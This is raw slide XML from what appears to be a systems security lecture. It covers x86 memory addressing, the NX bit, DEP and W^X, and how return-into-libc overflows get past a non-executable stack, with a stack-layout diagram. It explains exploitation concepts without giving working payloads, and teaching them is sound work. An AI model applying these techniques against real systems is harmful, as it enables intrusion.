                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1574290" h="1563945">
                <a:moveTo>
                  <a:pt x="1574290" y="1553448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="713678" y="1563945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00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6" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577643" y="3105159"/>
            <a:ext cx="889987"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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325492" y="4731909"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171791" y="2246556"/>
            <a:ext cx="1390124"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Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434685" y="4766535"/>
            <a:ext cx="864339" cy="646331"/>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File </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655428" y="4407559"/>
            <a:ext cx="1015150"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Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200020" y="3105159"/>
            <a:ext cx="1312679"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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079178" y="4558785"/>
            <a:ext cx="477602"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OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7769498" y="4743451"/>
            <a:ext cx="774883" cy="891316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39337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6" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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-8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 8 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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eax</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edx</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>moves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the memory at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * 2</a:t>
            </a:r>
          </a:p>
          <a:p>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$0x804a0e4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (0x804a0e4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the content of memory at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0x804a0e4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51753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0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0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0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0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0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0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0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06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06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106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Exploitation Harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Continuous arms race: we will follow a semi-historical approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Step 1: Non-executable stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107795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Stack Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order to avoid execution of code on the stack, Linux leverages the NX bit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires that the kernel uses the Physical Address Extension mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The NX bit marks a memory area as Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecutable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103836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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEP and W^X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Execution Prevention (DEP) is Microsoft’s implementation of the NX mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It supports the NX bit in hardware if present, or it emulates the mechanism if missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W^X (W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> X) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a security feature of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenBDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forces pages to be either executable or writable but not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>both</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12969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6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6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6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6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with Non-Executable Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The idea behind the NX bit (W^X/DEP) is to never have memory that is both writable and executable at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain applications, like JIT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> interpreters, might require this feature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10160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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Return-into-libc Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the stack is protected from execution, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>overflow can be used to set a fake call frame that will be invoked when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is executed by the currently executing function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any function that is currently linked can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executed </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ften </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executable areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker needs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to be able to locate the address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugger, /proc/maps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65850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9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9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9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9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9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9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81" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="32575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saved ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202183" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="29718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saved eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202184" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3543300"/>
            <a:ext cx="1905000" cy="8572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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202185" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="4286250"/>
            <a:ext cx="0" cy="68580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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202186" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="533400" y="2228850"/>
            <a:ext cx="0" cy="7429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2187" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2228850"/>
            <a:ext cx="0" cy="7429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2188" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="44005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2189" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="533400" y="44005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2198" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="32575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garbage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202199" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="29718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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202200" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3543300"/>
            <a:ext cx="1905000" cy="8572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garbage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202201" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="4286250"/>
            <a:ext cx="0" cy="68580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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202202" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2819400" y="2228850"/>
            <a:ext cx="0" cy="7429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2203" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="2228850"/>
            <a:ext cx="0" cy="7429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2204" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="44005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2205" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2819400" y="44005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2206" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="26860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fake caller return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202207" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="24003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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
